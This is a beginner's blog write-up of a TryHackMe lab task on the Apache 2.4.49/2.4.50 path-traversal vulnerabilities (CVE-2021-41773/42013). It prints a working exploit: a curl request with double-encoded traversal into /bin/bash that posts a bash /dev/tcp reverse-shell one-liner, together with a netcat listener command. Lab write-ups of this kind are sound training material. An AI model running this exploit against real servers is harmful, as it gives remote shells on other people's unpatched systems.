CVE-2021–41773/42013 THM Write-up [Task-4]
This is a short write-up for beginners of the task-4 of the www.tryhackme.com box on CVE-2021–41773 and 42013; the infamous Apache HTTP server path traversal vulnerabilities.
You can access and try the box here: https://tryhackme.com/room/cve202141773
This is an informational box, where you mainly learn about the above mentioned CVE and it’s impact, and the author of the box hydragyrum has done an excellent job at explaining it.
While tasks 1–3 are quiet straightforward and can be done easily by reading the info text thoroughly, and maybe some help with online tools for encoding the text; task-4 is the practical exam. For a beginner, who might need help with reverse-shell using netcat, this is a simple write-up to show how to do it.
Note: the box will take around 5–7min. to come up.
Let’s first verify that everything is working fine:
curl http://<thm_ip>:8080
So it verifies that everything is working good.
Let’s move on to solving the questions of task-4.. following almost the same commands shown in task-3
Note: don’t forget to replace the IP address and port of your corresponding machine shown on THM.
Port 8080 has Apache 2.4.49 without CGI.
Port 8081 has Apache 2.4.49 with CGI
Port 8082 has Apache 2.4.50 without CGI
Hence we need double-encoding here as explained in task-3
Port 8083 has Apache 2.4.50 with CGI
This part is not shown in task-3 as of the writing time of this article. But if you have understood and done the above 3 hacks, this is no different. You just need to double-encode the path you want to traverse
Getting a reverse-shell:
We will use netcat for this. On your target machine start a netcat listener
nc -lv <port>
Note: you might need to use this with “sudo” depending on how your computer is configured
The hint on the question leads to https://www.revshells.com. I personally prefer the cheatsheet from pentestmonkey. However, for this task, it really doesn’t matter. We just need a simple bash command to get revershell
bash -i >& /dev/tcp/<target_machine_ip>/<target_machine_port> 0>&1We replace the target machine IP and the target machine port with the IP address of our target machine, and the port we are listening to on netcat.
Then we run the following command in a new window:
curl -v ‘http://<thm_ip>:8083/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash' -d ‘echo; bash -i >& /dev/tcp/<target_machine_ip>/<target_machine_port> 0>&1’
If you have done everything right, you should see the above screen, and the netcat session on another terminal should now have got you a reverse-shell
This should already give you the answer to the next question. You can also run, whoami command to get the answer.
Getting root flag:
This is the part which I found a little strange. Normally we will be expected to find a way to escalate our privileges. However, the hint to the question already gives us the password for the root user. So I suppose this task is mainly to verify again that you indeed have achieved reverse-shell? (remember, this is an info. box)
If I find a way to escalate the privileges to root without using the password-hint, I will update this article.
Anyway, for now, the task is quite simple. Change to root user using the password-hint and get the root.txt flag.
With his, we finish the task-4 :)
I hope this write-up helps the beginners who are making it into this field or anyone who is curious about the Apache CVE-2021–41773/42013 vulnerabilities.
